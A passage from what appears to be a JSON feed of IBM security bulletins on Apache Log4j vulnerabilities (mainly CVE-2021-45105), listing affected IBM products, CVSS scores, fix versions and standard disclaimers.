vulnerability (CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6528388> \"Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerability \\(CVE-2021-45046\\)\" )\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n20 April 2022 Updated Fix Version links for CA 11.x Bundle Customers to point to latest Interim Fix that address Apache log4j vulnerabilities \n10 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSTSF6\",\"label\":\"Cognos Analytics\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"11.2, 11.1, 11.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-20T19:28:52", "type": "ibm", "title": "Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerabilities (CVE-2021-45105, CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-04-20T19:28:52", "id": "59E669B8BB67D676E7382F77EAD621E08DFCFBF626C52F337A77A33EF6F33748", "href": "https://www.ibm.com/support/pages/node/6538720", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "## Summary\n\nApache Log4j Vulnerability Affects IBM Sterling Control Center (CVE-2021-45105). Customers are encourages to take action and apply the fix below. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Control Center| 6.2.1.0 \nIBM Control Center| 6.2.0.0 \nIBM Control Center| 6.1.3.0 \n \n\n\n## Remediation/Fixes\n\n**Product**\n\n| \n\n**VRMF**\n\n| \n\n**iFix**\n\n| \n\n**Remediation** \n \n---|---|---|--- \n \nIBM Sterling Control Center\n\n| \n\n6.2.1.0.\n\n| \n\niFix04\n\n| \n\n[Fix Central - 6.2.1.0](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Control+Center&release=6.2.1.0&platform=All&function=all>) \n \nIBM Sterling Control Center\n\n| \n\n6.2.0.0\n\n| \n\niFix14\n\n| \n\n[Fix Central - 6.2.0.0](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Control+Center&release=6.2.0.0&platform=All&function=all>) \n \nIBM Sterling Control Center\n\n| \n\n6.1.3.0\n\n| \n\niFix10\n\n| \n\n[Fix Central - 6.1.3.0](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Control+Center&release=6.1.3.0&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n21 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS9GLA\",\"label\":\"IBM Control Center\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"}],\"Version\":\"6.1.3.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS9GLA\",\"label\":\"IBM Control Center\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"}],\"Version\":\"6.2.1.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS9GLA\",\"label\":\"IBM Control Center\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"}],\"Version\":\"6.2.0.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-22T22:38:58", "type": "ibm", "title": "Security Bulletin: Apache Log4j Vulnerability Affects IBM Sterling Control Center (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45105"], "modified": "2021-12-22T22:38:58", "id": "1A308C90CA9D34C9787724E32DAA927E0CC6F10A74C5CF15E523AAE37176CF1C", "href": "https://www.ibm.com/support/pages/node/6536780", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-06-28T22:06:54", "description": "## Summary\n\nApache Log4j is used by IBM Cloud Pak for Data System 1.0 in Openshift Logging. This bulletin provides a remediation for the Apache Log4j vulnerability (CVE-2021-45105).\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nCPDS| 1.0.0.0- 1.0.7.7 \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now by upgrading to the following ICPDS version**\n\n**For NPS customers:**\n\nNPS customer needs to upgrade to the following IBM Cloud Pak for Data System 1.x version where Red Hat OpenShift Container Platform 3.11 is no longer available. \n\n**Product**| VRMF| Remediation / Fix \n---|---|--- \n \nIBM Cloud Pak for Data System 1.0\n\n| 1.0.7.8| [Link to Fix Central](<https://www.ibm.com/support/fixcentral/swg/selectFixes?fixids=1.0.7.8-WS-ICPDS-fp161&product=ibm%2FWebSphere%2FIBM%20Cloud%20Private%20for%20Data%20System&source=dbluesearch&mhsrc=ibmsearch_a&mhq=1.0.7.8&function=fixId&parent=ibm/WebSphere>) \n \n * Please refer the **[release notes](<https://www.ibm.com/docs/en/cloud-paks/cloudpak-data-system/1.0.7.x?topic=new-version-1078-release-notes>)** for ICPDS 1.0.7.8\n\n**For CPD customers:**\n\nCPD customers needs to migrate to the following IBM Cloud Pak for Data System 2.x version.\n\n**Product**| VRMF| Remediation / Fix \n---|---|--- \n \nIBM Cloud Pak for Data System 2.0\n\n| 2.0.1.1| [Link to Fix Central](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FWebSphere%2FIBM+Cloud+Private+for+Data+System&fixids=2.0.1.1-WS-ICPDS-fp120&source=SAR>) \n \n * Please refer the **[release notes](<https://www.ibm.com/docs/en/cloud-paks/cloudpak-data-system/2.0?topic=20-version-2011-release-notes>)** for ICPDS 2.0.1.1\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n6 Jun 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSHDA9\",\"label\":\"IBM Cloud Pak for Data System\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All 1.x Versions\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-06-06T14:45:48", "type": "ibm", "title": "Security Bulletin: IBM Cloud Pak for Data System 1.0 is vulnerable to denial of service due to Apache Log4j (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45105"], "modified": "2022-06-06T14:45:48", "id": "9A1FFC27915FCEB638A5FB6C3316111A4211363FE0EC89A0019FA42A7CB89808", "href": "https://www.ibm.com/support/pages/node/6592581", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-06-28T22:02:53", "description": "## Summary\n\nApache Log4j open source library is used by Content Collector for File Systems. This bulletin describes the upgrades necessary to address the vulnerability.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for File Systems| 4.0.x \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading the product below: \n\n**Product**\n\n| **VRM**| **Remediation** \n---|---|--- \nContent Collector for File Systems| 4.0.1| Upgrade to: Content Collector for File Systems [4.0.1.13 Interim Fix 001](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.13-IBM-ICC-IF001&source=SAR> \"4.0.1.13 Interim Fix 001\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n14 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSAE9L\",\"label\":\"Content Collector\"},\"Component\":\"Content Collector for Email\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"4.0.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-01-14T13:15:31", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects Content Collector for File Systems (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45105"], "modified": "2022-01-14T13:15:31", "id": "8A20ED34CC4EABFD78A0599C47EC735B1923D5C4CE1DF595D753961732461EA4", "href": "https://www.ibm.com/support/pages/node/6540940", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-06-28T21:58:25", "description": "## Summary\n\nSecurity Bulletin: Operations Dashboard is vulnerable to Log4j CVE-2021-45105 with details below\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nOperations Dashboard| 2020.4.1 \n2021.1.1 \n2021.2.1 \n2021.3.1 \n2021.4.1 \n \n\n\n## Remediation/Fixes\n\n**Operations Dashboard version 2020.4.1 in IBM Cloud Pak for Integration** \nUpgrade Operations Dashboard to 2020.4.1-6-eus using the Operator upgrade process described in the IBM Documentation \n<https://www.ibm.com/docs/en/cloud-paks/cp-integration/2020.4?topic=components-upgrading-operations-dashboard> \n \n**Operations Dashboard version 2021.1.1, 2021.2.1, 2021.3.1, and 2021.4.1 in IBM Cloud Pak for Integration** \nUpgrade Operations Dashboard to 2021.4.1-2 using the Operator upgrade process described in the IBM Documentation \n<https://www.ibm.com/docs/en/cloud-paks/cp-integration/2021.4?topic=capabilities-upgrading-integration-tracing>\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n11 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU004\",\"label\":\"Hybrid Cloud\"},\"Product\":{\"code\":\"SSYMXC\",\"label\":\"IBM Cloud Pak for Integration\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF040\",\"label\":\"RedHat OpenShift\"}],\"Version\":\"All\",\"Edition\":\"\"}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-01-11T15:14:55", "type": "ibm", "title": "Security Bulletin: Operations Dashboard is vulnerable to Log4j CVE-2021-45105", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45105"], "modified": "2022-01-11T15:14:55", "id": "D9D956C60F66CFAE1D9189841B4A3D7D9E24B0A79B088C79120CBB100E34A220", "href": "https://www.ibm.com/support/pages/node/6539878", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-06-28T22:13:28", "description": "## Summary\n\nLog4j is used by IBM\u00ae QRadar User Behavior Analytics add on to IBM\u00ae QRadar SIEM to log system events. This bulletin provides a remediation to address the Log4j vulnerability CVE-2021-45105 by upgrading IBM\u00ae QRadar User Behavior Analytics add on to IBM\u00ae QRadar SIEM\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nQRadar User Behavior 